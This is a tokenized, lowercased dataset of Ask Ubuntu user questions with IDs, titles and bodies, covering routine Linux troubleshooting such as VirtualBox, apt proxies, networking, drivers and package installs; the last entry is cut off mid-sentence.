426409	can no longer mount guest additions cd in ubuntu virtualbox guest	i 've been using virtualbox for weeks for school . tonight , out of the blue , my virtual guest locks up and when i reset , there are so many issues . i first had an issue with my screen no longer resizing as i drag the window - so i thought i would just resinstall guest additions . i ran the software manually ( by opening the image and clicking `` run software '' ) and it appears to have done whatever it needed to . but the problem persists . now when i try to mount the guest additions image , i get the following error : unable to mount vboxadditions_4.3.6_91406 error mounting /dev/sr0 at /media/user/vboxadditions_4.3.6_914061 : command-line mount-t `` iso9660 '' -o [ ... ] exited with non-zero exit status 32 : mount : unkown filesystem type 'iso9660' can someone please help me out ? i 'm a little desperate here ... since i have projects due for class and ca n't really do anything efficiently now . worth noting : i performed the same steps on a backup image i had of my vm , and the same issue is occurring . i have no idea what 's changed ...
426410	does xampp work in ubuntu ?	i was thinking about using ubuntu but wanted to make sure that i could use xampp because i am somewhat familiar with it .
426414	how to switch between two internet connections without rebooting ?	i have two internet connections , one with the static ip and the other with the pppoe.when my static ip connection is not working , i switch to the pppoe connection . i change my connection this way , i change the /etc/network/interfaces file then i run the following command sudo /etc/init.d/networking restart i have to reboot my system to get connectivity . is there a way i can change connection without rebooting ?
426415	apps icon seemed to have changed and not responding on click .	when i go into the dash home - applications , i see two icons that look like supply boxes with no name . when i click on them nothing happens . as far as i remember these were n't there before and i think there were actual applications instead of these . can someone please tell me how to fix this ?
426416	during 13.04 to 13.10 desktop update the computer went offline , how can i restart the update process ?	i would like to restart the update/upgrade for 13.10 . the process was aborted by a power off situation after it had started . the updater process was working well until that point . now the updater locks and wo n't switch to the upgrade option . i assume that the problem exists because some intermediate state is interpreting the problem as `` still in progress '' and wo n't release the system to start over . any thoughts ? ps- i had just completed this same step for the 64-bit desktop and things went fine , so i think it will work again if i can get the system to think it needs to update/upgrade . also fyi all of this is happening under vmware workstation .
426417	sudo apt-get update/ failed to update	i just installed ubuntu 13.10 saucy salamander . when i try sudo apt-get update and i get the response err http : //extras.ubuntu.com saucy inrelease err http : //archive.canonical.com saucy inrelease err http : //extras.ubuntu.com saucy release.gpg unable to connect to extras.ubuntu.com : http : err http : //archive.canonical.com saucy release.gpg can not initiate the connection to archive.canonical.com:80 ( 2001:67c:1360:8c01 : :16 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1360:8c01 : :16 80 ] err http : //security.ubuntu.com saucy-security inrelease err http : //security.ubuntu.com saucy-security release.gpg can not initiate the connection to security.ubuntu.com:80 ( 2001:67c:1562 : :15 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :15 80 ] ... more lines like the above . ... w : some index files failed to download . they have been ignored , or old ones used instead . i am on a school campus with a proxy . but i can access the internet , i 'm using the ubuntu to post this . my /etc/apt/ folder does not have a apt.conf file to edit . is there a default one i can get from somewhere ? i think it might have to do with ipv6 since the ips of the sources are ipv6 . is there a way to specify to use ipv4 ? or would i need to go into the source list and manually figure them all out ? i just feel there should be an easier way . thanks ! any comments are helpful . thanks ! talked to my school admin and got the proxy address . plugged him in and got it working .
426419	kubuntu 13.10 problem with monitor	when i installed kubuntu 13.10 ( virtual ) , it did not recognize my compaq 19 '' monitor in a compaq presario pc and ca n't see the desktop properly . conclusion : i must cancel the installation ( real ) . my pc is a compaq presario 64-bit and i tried to install the kubuntu 13.10 64-bit version . kubuntu 13.10 ( 64-bit and 32-bit versions ) in the try ubuntu installation option do not recognize my compaq 19 '' monitor ( identify it as a simply vga and ca n't see the icons and the desktop properly ) . i am using compaq presario with an amd athlon ii x3 435 64-bit processor and 2gb ram . i have two questions : is there any iso installation that can correct this problem ? ( i could not try kubuntu in virtual mode . ) if i install kubuntu ( not in try option ) will the installation process correct this problem ? i tried to use ubuntu ( instead of kubuntu ) and the problem was more complicated because the screen turned into a corrupted screen with horizontal red lines and i ca n't see anything .
426425	will swap space auto-adjust when i upgrade my physical memory ?	when i installed ubuntu 13.10 i just ran through the default setup . since then , i have decided to upgrade my physical memory . my question is , will ubuntu auto-adjust the default swap size to match the new memory . if not , how do i adjust it myself ?
426426	using ubuntu for a nas server	i would like to setup a nas server in my house something like this . basically for storing and sharing files in my network , download torrents , keep a bitcoin node ( just for me , to have my bitcoins in my machine ) and to automate a couple of things . i do not want freenas or something like that because i want to do whatever i want with my server and no just things supported out-of-the-box . for sure , i will use an old pc for this . i do n't have it yet but , i thinking on 2gb memory , 1.2/1.6ghz . i have a couple of questions : should i use ubuntu desktop or server ? does the desktop version consume more resources ? if i use the server version , is it possible download bitorrent with command lines ? is ubuntu appropriate for this ? or , should i look for a lighter distro ?
426427	boot takes long time : `` switching to clocksource tsc ``	i am working on pxeboot server . i installed pxeboot server in one virtual machine and i start my pxeboot client it takes time to boot while it got this message `` switching to clocksource tsc '' how to fast boot the pxeboot client . how to resolve the switching to clocksourse tsc issue ?
426429	how to find active users in ubuntu ?	with help of the who command we can get active users , i want only the first field such as user 1 user 2 user 3
426430	ca n't read private key depmod	i am a brand new user of ubuntu 12.04 . i have never used linux . i am attempting to install cdemu , but i am running into a problem . i have downloaded the files and extracted them to a folder on my desktop . i open a terminal and cd to the directory . i then type sudo make , it asks me for my user account password , i enter it then it seems to proceed : make -c /lib/modules/3.11.0-17-generic/build m=/home/family/desktop/vhba-module-20130607 modules make [ 1 ] : entering directory /usr/src/linux-headers-3.11.0-17-generic cc [ m ] /home/family/desktop/vhba-module-20130607/vhba.o building modules , stage 2 . modpost 1 modules cc /home/family/desktop/vhba-module-20130607/vhba.mod.o ld [ m ] /home/family/desktop/vhba-module-20130607/vhba.ko make [ 1 ] : leaving directory /usr/src/linux-headers-3.11.0-17-generic i then type sudo make install , and i get this : family @ ubuntu : ~/desktop/vhba-module-20130607 $ sudo make install make -c /lib/modules/3.11.0-17-generic/build m=/home/family/desktop/vhba-module-20130607 modules_install make [ 1 ] : entering directory /usr/src/linux-headers-3.11.0-17-generic install /home/family/desktop/vhba-module-20130607/vhba.ko ca n't read private key depmod 3.11.0-17-generic make [ 1 ] : leaving directory /usr/src/linux-headers-3.11.0-17-generic can anyone help me understand why this is happening or what i am doing wrong ?
426432	libreoffice installation does not happen	how do i install libreoffice 4.2.1 in xubuntu 13.10 ? after i download it and extract it , it ca n't get installed after downloading and extracting .
426435	how to completely remove virsh from ubuntu	how to uninstall virsh from ubuntu 13.10 server . i have already removed libvirt-bin , qemu and kvm but virsh is still running . i used following command to remove libvirt-bin . apt-get remove -- purge libvirt-bin kvm qemu qemu-system-x86 apt-get autoremove reboot also tried apt-get remove virsh but did n't work reading package lists ... done building dependency tree reading state information ... done e : unable to locate package virsh thanks ,
426437	uninstall ubuntu and install it again along with windows	i use ubuntu 12.04lts and now i want to format my laptop and then make two os get installed : - windows 7 or windows 8 . ubuntu 12.04lts . please tell me step by step way to do the same . i am having problem basically during uninstalling the ubuntu as i do n't know how to do it .
426440	unable to ping ubuntu server 12.04 from devices connected using openvpn	i 'm new here and new to ubuntu i have a network with several centos servers , an ubuntu server , a firewall handling openvpn connections and a router external users are connected to the network using openvpn their ip addresses are around 192.168.16.x while the servers are 192.168.1.x i 'm unable to ping the ubuntu server ( 192.168.1.60 ) while connected through openvpn there are no problems to ping the centos servers what do i need to do to allow 192.168.16.x users to ping or connect to the ubuntu server ? this is the interface config : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.1.60 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.253
426441	ubuntu 13.10 slow on asus 1005p	after having upgraded from 13.04 which was super stable and performing absolutely o.k . i have great problems with 13.10 now . all graphical processes and programs are extremly slow . tried to remove zeitgeist but failed . cab i reinstall 13.04 and how would i do that ? my computer : asus 1005p ram 2 gb processor intel® atom™ cpu n450 @ 1.66ghz × 2 graphic card gallium 0.4 on llvmpipe ( llvm 3.3 , 128 bits ) system 32 bit
426443	how to disable `` restore previous session '' in mozilla firefox	for privacy i want to disable this feature in firefox , so when i open firefox i want to load my homepage and not the option of restore previous session tabs and annoying things . any help .
426449	ca n't use hdd alongside ssd	i 've installed ubuntu on a ssd , how do i lock the ssd so i cant be used and how do i make my hdd mass storage . my hdd is not showing up in the ubuntu home finder so i can only save documents to the ssd . i only want the ssd for the software . how can i make the hdd visible and the default drive for ubuntu . the ssd is a 120gb so if there is any free space i 'd like to partition it so i can keep the free space and lock the os side . i do n't know how . thank you
426451	ca n't find what i installed	i installed kdiff3qt through the synaptic package manager but now i ca n't find it . i 've looked in the ubuntu software center and it shows that it ( and kdiff3-doc ) was installed but i ca n't find it anywhere . any suggestions on how to find it ?
426452	printer printing light pages	my printer gives out very light ( barely recognizable ) pages . forums suggested increasing the dpi , but there was only one option available ( 300 dpi ) . the issue is not with low ink or toner levels , as confirmed by the fact that windows prints from it nicely and darkly ( although to be fair to ubuntu , windoze did require tons of setup ; and is still less trouble-shootable ) . details : hp laserjet printer p2014 ubuntu 13.10 x64 dual-booting with windows 8.1 x64
426457	how to save kftpgrabber site in kwallet	i 'm researching for a more secure ftp client which is more securelely stores site details like passwords , than filezilla and found kftpgrabber fits with my need . however for get the most out from kftpgrabber , i need to configure a site ( ftp connection ) bookmark with kwallet . however i 'm not familiar with this task . also there 's no help on online either . anyone can guide me to configure a kwallet site and use that on kftpgrabber ?
426458	phpmyadmin in lampp not opening	i installed xampp and set the security of lampp by ./lampp security setting password for xampp mysql phpmyadmin proftpd . when i start xampp by : black @ black-oem : / $ sudo /opt/lampp/lampp start starting xampp for linux 1.8.3-2 ... xampp : starting apache ... ok. xampp : starting mysql ... ok. xampp : starting proftpd ... warning : world-writable config file '/opt/lampp/etc/my.cnf ' is ignored ok. typing localhost/xampp in browser open xampp page with a password prompt that i set . but when i click phpmyadmin it says phpmyadmin - error wrong permissions on configuration file , should not be world writable ! in xampp status mysql showing deactivated i have permission to read and write for all owner : root group : root
426465	how to remove the preview image on video and picture files in foldes ?	i would like to have that setup like in windows where just the file names are showing and not any small picture of the image or video preview of the file . this is all when browsing in folders : ) thanks , daniel
426468	how to customize ubuntu 12.04	i want to customize my ubuntu 12.04 for my project work . i want to remove all the 'extra ' packages which do n't affect the running of my computer or other package dependencies . example : i want to remove firefox and install chrome as my default browser . i also want to change the name ubuntu to atom everywhere .
426473	problem with gnome 3 internet connections	i need your help . i use ubuntu 12.04 lts and i decided to give gnome a try . i liked it more than unity so i decided to stick with it . i customized many things to make it a better experience for me . however , there is one problem that i seem to be unable of finding a proper solution for it . for ubuntu 12.04 i am allowed only to use gnome 3.4 . i am ok with this , but i have a problem with it lacking the option to disconnect from a wifi network , for instance . the only option i get is to turn off the wifi adapter . i can do that , but i just do n't want to keep turning it off and on . i searched the internet for a solution and i found two . first , to update to gnome 3.10 , which is useless for me since i ca n't do this with ubuntu 12.04 . second , to use a network manager other than network-manager-gnome which and wicd was recommended . i downloaded it and it has the option to disconnect , but i ca n't use it since , for some reason , it does n't detect my mobile broadband usb device which i use a lot when i do n't have access to wifi connections . so is there a way to get the option of disconnecting from a network in the gnome manager . i even do n't understand why it is not working , since it was working in unity . it 's the same network manager , but i was able to disconnect when i used unity while it 's not possible under gnome . i apologize for the long question .
426474	window title bars are not displaying correctly 13.10 when laptop plugged in	) as you can see the window title bars are completely messed up ( partly transparent or white ) when they should be all grey according to the ambiance theme when plugged in . and the weird thing is it seems to almost completely go back to normal when i unplug my laptop . i say almost because if you look closely at the window edges , you can see there is a boarder of pixels around each window doing weird things ... i do have laptop-mode-tools installed and i realize that is probably why things change when unplugged . but when i uninstalled laptop_mode the titles were just messed up all the time and never went back to normal at all . also it is only ambiance and radiance themes that are being messed up . high contrast and adwaita are normal .
426476	ubuntu 10.04 lts hang on reboot after adding hv_netvsc module ( hyper-v )	i installed ubuntu 10.04 lts on a vm in a windows server 2012 hyper-v environment . as there was an error shown ( network interface not detected ) during the install , i searched the internet for a solution . i did find this article : how to install ubuntu server 10.04 in hyper-v as described i added the modules hv_vmbus , hv_storvsc , hv_blkvsc and hv_netvsc and did run sudo update-initramfs -u . after that i performed a sudo reboot , which ended in a system hang . the boot process always ends like this : ubuntu 10.04 lts hang i found out that the hv_netvsc module causes the hang . could anyone please help me to get the system work ?
426479	ubuntu 13.10 wont run progecad in wine	i 'm trying to run progecad in wine but it only loads the front screen and then locks up . also the mouse disappears when over the progecad window . i 've run from command line and get the following info : m56s-s3 : ~ $ wine `` c : \program files ( x86 ) \progesoft\progecad 2009 smart ! eng\icad.exe '' p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so : /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so : can not open shared object file : no such file or directory p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : can not open shared object file : no such file or directory fixme : psdrv : psdrv_updatedevcaps ca n't find page fixme : psdrv : psdrv_updatedevcaps ca n't find page fixme : psdrv : psdrv_updatedevcaps ca n't find page fixme : psdrv : psdrv_updatedevcaps ca n't find page fixme : ole : remunknown_queryinterface no interface for iid { 00000019-0000-0000-c000-000000000046 } fixme : ieframe : persiststreaminit_initnew ( 0x3aeaa50 ) killed m56s-s3 : ~ $ wine -- version wine-1.7.13 any ideas how to fix this ?
426480	can not increase wifi card power using iwconfig	so i set up a hotspot using hostapd , isc-dhcp-server and masquerading . the hotspot works and i can access internet . problem the connection speed is too slow . when i connect to my hotspot ( via android 4.1 , snapdragon s3 ) , i see a connection speed of 65mbps , which drops down to 1mbps in seconds . i know this is n't a hardware issue as i can easily get 24mbps ( 54mbps link ) out of my ethernet connection on windows ( via connectify ) . information iwconfig : mon.wlan0 ieee 802.11bgn mode : monitor tx-power=19 dbm retry long limit:7 rts thr : off fragment thr : off power management : on eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn mode : master tx-power=19 dbm retry long limit:7 rts thr : off fragment thr : off power management : off iw list : wiphy phy0 band 1 : capabilities : 0x70 ht20 static sm power save rx greenfield rx ht20 sgi rx ht40 sgi no rx stbc max amsdu length : 3839 bytes no dsss/cck ht40 maximum rx ampdu length 65535 bytes ( exponent : 0x003 ) minimum rx ampdu time spacing : 8 usec ( 0x06 ) ht tx/rx mcs rate indexes supported : 0-7 frequencies : * 2412 mhz [ 1 ] ( 19.0 dbm ) * 2417 mhz [ 2 ] ( 19.0 dbm ) * 2422 mhz [ 3 ] ( 19.0 dbm ) * 2427 mhz [ 4 ] ( 19.0 dbm ) * 2432 mhz [ 5 ] ( 19.0 dbm ) * 2437 mhz [ 6 ] ( 19.0 dbm ) * 2442 mhz [ 7 ] ( 19.0 dbm ) * 2447 mhz [ 8 ] ( 19.0 dbm ) * 2452 mhz [ 9 ] ( 19.0 dbm ) * 2457 mhz [ 10 ] ( 19.0 dbm ) * 2462 mhz [ 11 ] ( 19.0 dbm ) * 2467 mhz [ 12 ] ( 19.0 dbm ) ( passive scanning , no ibss ) * 2472 mhz [ 13 ] ( 19.0 dbm ) ( passive scanning , no ibss ) * 2484 mhz [ 14 ] ( disabled ) bitrates ( non-ht ) : * 1.0 mbps * 2.0 mbps ( short preamble supported ) * 5.5 mbps ( short preamble supported ) * 11.0 mbps ( short preamble supported ) * 6.0 mbps * 9.0 mbps * 12.0 mbps * 18.0 mbps * 24.0 mbps * 36.0 mbps * 48.0 mbps * 54.0 mbps lspci -v : 0a:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) subsystem : hewlett-packard company device 1795 flags : bus master , fast devsel , latency 0 , irq 19 memory at d4500000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 40 ] power management version 3 capabilities : [ 58 ] vendor specific information : len=78 < ? > capabilities : [ 48 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ d0 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 13c ] virtual channel capabilities : [ 160 ] device serial number < removed > capabilities : [ 16c ] power budgeting < ? > kernel driver in use : bcma-pci-bridge 0b:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 07 ) subsystem : hewlett-packard company device 1818 flags : bus master , fast devsel , latency 0 , irq 43 i/o ports at 2000 [ size=256 ] memory at d4404000 ( 64-bit , prefetchable ) [ size=4k ] memory at d4400000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 70 ] express endpoint , msi 01 capabilities : [ b0 ] msi-x : enable- count=4 masked- capabilities : [ d0 ] vital product data capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] virtual channel capabilities : [ 160 ] device serial number < removed > kernel driver in use : r8169 ubuntu release : distrib_id=ubuntu distrib_release=13.10 distrib_codename=saucy distrib_description= '' ubuntu 13.10 '' linux pr3d4tor 3.11.0-17-generic # 31-ubuntu smp mon feb 3 21:52:43 utc 2014 x86_64 x86_64 x86_64 gnu/linux what i have tried : transmission power : prakhar @ pr3d4tor : ~ $ sudo iwconfig mon.wlan0 txpower 24 bit rate : prakhar @ pr3d4tor : ~ $ sudo iwconfig mon.wlan0 rate auto disable power management : prakhar @ pr3d4tor : ~ $ sudo iwconfig mon.wlan0 power off error for wireless request `` set power management '' ( 8b2c ) : set failed on device mon.wlan0 ; invalid argument . i tried the above for wlan0 as well . no results . can anyone guide as to what might be the problem ?
426482	mark pdf as adobe pdf	there are several journal websites ( typically taylor and francis ) that require that all pdf files submitted to it for reviewing should be adobe pdfs . the submission engine will not accept a pdf generated by latex or openoffice . to do this conversion , one has to actually boot into windows , open the pdf file with adobe acrobat reader , save as a new file and then upload the paper to the journal website . this is is kind of a funny procedure and hampers the freedom . what software can i install , so that i can denote the pdf as an adobe pdf , so that i can easily submit the paper to the journal website .
426483	why are there two network indicators with ubuntu-desktop in kubuntu	i installed kubuntu 13.10 32 bit on my yoga 2 pro and after some days all window decorations were gone and i could n't repair that , so i decided to install aptitude install ubuntu-desktop and use ubuntu ever since . the only strange thing is , that there are two network controls somehow on my system now in the top right corner : the kright one , you can mark and unmark all wifi networks and hafe `` wi-fi settings '' ( unlocalized in english ) which does nothing , when you click on it . the left one is locallized and looks like this : '' bearbeiten '' means settings and works fine how can i find out what those are ? those are the relevant packages installed , i think : dpkg -l|gawk ' { print $ 1 `` `` $ 2 } '|egrep `` network|-nm '' ii gir1.2-networkmanager-1.0 ii glib-networking : i386 ii glib-networking-common ii glib-networking-services ii indicator-network ii kdenetwork-filesharing ii libnetworkmanagerqt0 ii libproxy1-plugin-networkmanager : i386 ii libqt4-network : i386 ii libqt5network5 : i386 ii libqtscript4-network : i386 ii network-manager ii network-manager-gnome ii network-manager-pptp ii network-manager-pptp-gnome ii plasma-nm complete list here : https : //gist.github.com/rubo77/58d8785561c5ac023192 edit if i start the system manager i see there are the processes nm-applet and indicator-network-service it seems they are not working together well ? how can i remove the indicator-network-service ?
426496	how i can i set up ubuntu with as much as possible on a nonbootable raid	i have an older system with a bios , a 64gb ssd , an a nonbootable fakeraid running windows 8.1 i want to install ubuntu and move as much of the installation as possible to the nonbootable raid . i 've cleared 5gb on the ssd for ubuntu but i want to put as little as possible on it . i am not well versed in linux and hope to change that with this install .
426497	is there a way to install a package available in ubuntu karmic on ubuntu precise pangolin ?	i want to install gfortran-4.4.1 on ubuntu 12.04 ( precise pangolin ) . but the only versions available in repositories are 4.4.7 , 4.5 and 4.6 . however gfortran-4.4.1 can be easily installed via apt-get on ubuntu 9.10 ( karmic ) . so i tried , to replace etc/apt/sources.list with the one from karmic . then i did sudo apt-get update . everything worked fine , but when i tried to install gfortran i kept getting error messages like `` depends : [ package name ] but it is not going to be installed . '' i tried to remove those packages and reinstall older version of them , but it did n't seem to help . do you have any suggestions ?
426500	how to install new theme for ubuntu customization	i am customizing the ubuntu 12.04 lts edition for my project work and i want to install new gui look or theme in customization . how can i inbuilt a new theme for distro and make it as default theme .
426505	getting problem while executing ./bootstrap	bootstrap file content : ! /usr/bin/env bash # the contents of this file are subject to the monetdb public license # version 1.1 ( the `` license '' ) ; you may not use this file except in # compliance with the license . you may obtain a copy of the license at # http : //monetdb.cwi.nl/legal/monetdblicense-1.1.html # # software distributed under the license is distributed on an `` as is '' # basis , without warranty of any kind , either express or implied . see the # license for the specific language governing rights and limitations # under the license . # # the original code is the monetdb database system . # # the initial developer of the original code is cwi . # portions created by cwi are copyright ( c ) 1997-july 2008 cwi . # copyright august 2008-2011 monetdb b.v. # all rights reserved . # note : if you happen to have bootstrap failures due to missing m4 # macros , export m4dirs as a space separated list of directories where # aclocal should look in your environment . pythonpath= $ { pwd : - $ ( pwd ) } /buildtools/autogen $ { pythonpath : + : $ pythonpath } export pythonpath # cope with systems where libtool is not gnu libtool , e.g . darwin type -p glibtoolize > /dev/null \ & & libtoolize=glibtoolize \ || libtoolize=libtoolize _m4_extra_dirs= if [ [ -n $ { m4dirs } ] ] ; then for d in $ { m4dirs } ; do case $ { d } in `` -i '' ) d= ; ; `` -i '' * ) d= $ { d # -i } ; ; esac [ [ -n $ { d } ] ] & & _m4_extra_dirs= '' $ { _m4_extra_dirs } -i $ { d } '' done fi python buildtools/autogen/autogen.py & & ( # replace the line starting with ac_config_files in configure.ag with # the command to substitute the configure results into the .in files , # making sure executable files remain executable . sed -n '/^ac_config_files/s/ . */ac_config_files ( [ / ; 1 , /^ac_config_files/p ' configure.ag while read f ; do [ -x $ f.in ] || echo $ f ; done < acout.in echo ' ] ) ' while read f ; do [ -x $ f.in ] & & echo `` ac_config_files ( [ $ f ] , [ chmod +x $ f ] ) '' ; done < acout.in sed '1 , /^ac_config_files/d ' configure.ag ) > configure.ac & & $ libtoolize -c -f & & aclocal -i . -i buildtools/conf $ { _m4_extra_dirs } & & autoheader & & automake -- add-missing -- copy -- foreign & & autoconf when i run command ./bootstrap , i get this error python : ca n't open file 'buildtools/autogen.py ' : [ error 2 ] no such file or directory what is the requirement to execute this command successfully .
426507	how to i copy bootable usb flash drive to larger drive ?	i 've tired a number of things to get this to work and i 'm missing something . i ran out of space on my 8gb bootable flash drive . i 'm running 12.04 server . the drive has sda1 ( primary 4gb ) , sda2 ( extended 4gb ) and sda5 ( swap 4gb ) . i tried copying old drive to new drive using ddrescue ( whole drive copy ) and then resizing on another linux box using gparted . i made sda1 ~22gb ( 75 % of the drive ) and used the remaining space for sda2 and sda5 . when i tried booting it i get to the grub menu and when i select the os i get a message about not enough room or space . next try . i dd 'd the mbr of the new drive and then created sda1 - primary linux 83 ( 75 % of sectors on drive ) , sda2 - extended 5 ( 25 % - remaining sectors ) , sd5 - logical linux 82 swap ( same sectors as sda2 ) . i then wrote the changes and exited fdisk . i then ran ddrescue with the following command : ddrescue -d -f -r3 /dev/sda1 /dev/sdb1 ( old drive copied to new drive ) . it competed successfully . i mounted the new copied partition and ran df to see the free space and it shows the same amount as the old small drive -97 % used . i thought i had to resize or something so i moved drive to other linux box and ran gparted . did n't find that the partiion needed resizing . the new partition has the same uuid as the original but i think i might need to copy the old swap partition uuid to the new one and i do n't know how - only how to randmly generate a new one . so , where did i go wrong here . am i close to getting this right ?
426509	an unresolvable problem occurred while calculating the upgrade	an unresolvable problem occurred while calculating the upgrade . please report this bug against the update-manager package and include the following error message : 'e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . ' sudo apt-get upgrade brings me this . renamon @ gibson { ~ } : sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : libgl1-mesa-dev linux-headers-generic-lts-raring linux-image-generic-lts-raring mesa-common-dev 0 upgraded , 0 newly installed , 0 to remove and 4 not upgraded . apt-get dist-upgrade -f brings me this root @ gibson : /home/renamon # apt-get dist-upgrade -f reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... failed the following packages have unmet dependencies : libgl1-mesa-dri-lts-raring : depends : libglapi-mesa-lts-raring but it is not going to be installed libglapi-mesa-lts-raring : i386 : conflicts : libglapi-mesa conflicts : libglapi-mesa : i386 libglu1-mesa-dev : depends : libgl1-mesa-dev or libgl1-mesa-dev-lts-quantal but it is not going to be installed or libgl1-mesa-dev-lts-raring but it is not going to be installed or libgl1-mesa-dev-lts-saucy but it is not going to be installed or libgl1-mesa-dev-lts-trusty but it is not installable or libgl-dev e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . root @ gibson : /home/renamon # dont know much on this end of linux , still a noob .
426516	samsung galaxy tab p3110 ubuntu touch not working	i tried to install ubuntu touch on my samsung galaxy tab 2 p3110 , using multiple solutions found over the internet but all of them have the same result my tablet screen remains blank . i have tried multiple ubuntu touch versions and none seems to work for me . i ca n't find any solution so please help me ! right now i have installed android 4.4.2 , and it 's running smoothly but i wa n't the ubuntu operating system : ( thanks !
426520	terminal startup	my problem is in my account on ubuntu 13.10 when i open terminal the cursor is something like that `` $ '' not something like that root @ yunus-ubuntu : ~ # or yunus @ yunus-ubuntu : ~ # why it is happening i created this account from another admin user typing this sudo useradd -d /home/yunus -m yunus ... .passwd yunus ... ..etc . i just wanted i clean account but there is a problem of terminal problem.. what is that `` $ '' that not leting me doing anything ... .i apriciate if you give detailed explanation ... do i have to root login or is there any way of to get rid of this nonsense startup ... thanks in advance
426523	dual external monitors use with dell m6800 laptop	got a new dell m6800 laptop with nvidia quadro k3100m video card . installing ubuntu worked like a charm , getting the nvidia card to work was a serious pain . making the pc work with two external monitors when it is plugged into a docking station is the next quest ( nightmare ) . the nvidia proprietary drivers installed are version 331.20 . booting the pc when it is plugged into the docking station ( lid closed ) make both internal lcd and one of the external screens to display the same information , but the external screen does not show up correctly . it is missing a bottom and right part of the screen . starting `` sudo nvidia-settings '' and performing detect displays results in no action at all ( 331.20 version does not allow to do much more than that ) . running `` sudo nvidia-xconfig '' generates a basic xorg.conf file but it can not be used . is there anybody out there who already went through this flow ( pain ) ? making two external monitors work when a laptop is docked . many thanks in advance ,
426524	how can i pack windows xp iso that is unpacked into a folder on ubuntu ?	i want to make a multiboot usb stick . i extracted xp.iso into a folder then added winvblock driver that lets iso load into memory . now i want to pack folder into iso but it 's not that simple since it must be bootable . is there such a tool that let me pack folder into iso ? edit : it 's not a duplicate of above mentioned link . i asked to make a bootable iso from folder . in the link it mentions how to create iso image from a folder which is very easy . anyway i found the answer here : https : //www.g-loaded.eu/2007/04/25/how-to-create-a-windows-bootable-cd-with-mkisofs/
426527	why can i not login with one user but with another user using ssh-keys ?	i do n't get it : why can i not login via ssh public-key beside the fact that i only copied the successful used private key from a user account on the client side to the root account on the client side ? i checked permissions in root on the client side authorized keys are there via ssh-copy-id . regards
426528	how to troubleshoot and solve internet connection problem using any browser	no matter which browser i use , i am unable to use the internet . my modem is working fine and the wired connection is recognized . after restarting the system few times , it starts working again . how can i troubleshoot and solve this issue ? is it in the 'configure vpn ' menu under networks indicator ?
426529	unable to install java sdk , via java_ee_sdk-7-jdk7-linux-x64.sh	i read through many of the q/a regarding installing java on ubuntu , i am not satisfied hence this post . i did the following , downloaded java ee sdk 7 , from oracle.com . sudo chmod a+x java_ee_sdk*.sh [ sudo ] password for srr : srr @ srr-lenovo-g580 : ~ $ ./java_ee_sdk*.sh extracting the installer archive ... extracting the installer runtime ... extracting the installer resources ... extracting the installer metadata ... welcome to glassfish installer using the user defined java_home : /usr entering setup ... java.lang.unsatisfiedlinkerror : no terminal in java.library.path at java.lang.classloader.loadlibrary ( classloader.java:1886 ) at java.lang.runtime.loadlibrary0 ( runtime.java:849 ) at java.lang.system.loadlibrary ( system.java:1088 ) at charva.awt.toolkit. < clinit > ( toolkit.java:895 ) at charva.awt.window.init ( window.java:62 ) at charva.awt.window. < init > ( window.java:58 ) at charva.awt.frame. < init > ( frame.java:32 ) at charvax.swing.jframe. < init > ( jframe.java:34 ) at charvax.swing.jframe. < init > ( jframe.java:30 ) at org.openinstaller.util.ui.chaxstandalonesplash. < init > ( chaxstandalonesplash.java:91 ) at org.openinstaller.core.orchestrator.main ( orchestrator.java:428 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:606 ) at org.openinstaller.core.enginebootstrap.main ( enginebootstrap.java:208 ) severe internal error : no terminal in java.library.path also , install openjdk using apt-get install openjdk-headless & sudo update-alternatives -- config java , and sudo update-java-alternatives -l java-1.7.0-openjdk-amd64 1071 /usr/lib/jvm/java-1.7.0-openjdk-amd64 thereafter , i repeated the above installation steps , but got the same error -- unable to budge any further . i do no want ot install oracle java runtime , hence do not want to do an apt-get install webup8 -- - etc . i want to install java ee sdk , so that i can set eclipse java_home , classpath variables in ides . please help me . note : : just before posting , read the following > > [ http : //www.noobslab.com/2012/12/install-oracle-java-7-in-ubuntu.html ] [ 1 ] gives elaborate instructions , but i ca n't get `` jee sdk `` to work with . thanking you in advance . dinesh babu
426531	desktop 's `` connect to server '' function repeatedly asks for ssh password after connecting	i would like to use the `` connect to server '' function ( available from the ubuntu desktop menu ) to open a nautilus window showing the file system of another machine through ssh , since i find it easier for simple file copying ( and similar ) tasks . previously , i was able to do that just fine , entering the server 's ip address , type : ssh and user name fields for the remote machine into the connect to server dialog box that pops up when clicking this menu entry and entering the remote machine 's password on request . recently however , after clicking the connect button , a modal input window kept asking me for the password repeatedly . the first 10 or so times i actually entered the correct password for the remote machine , after that i just left it blank but it kept re-opening each time i pressed either one of the ok , cancel or x ( window close ) buttons or the enter key . after many times , a nautilus window actually opened , but it kept asking me for the password . after even more times , the dialog did n't come up by itself , so i thought i could now browse the remote machine 's file system . unfortunately even then , as soon as i clicked a folder or file , i had to click away many of the password requests again . interestingly 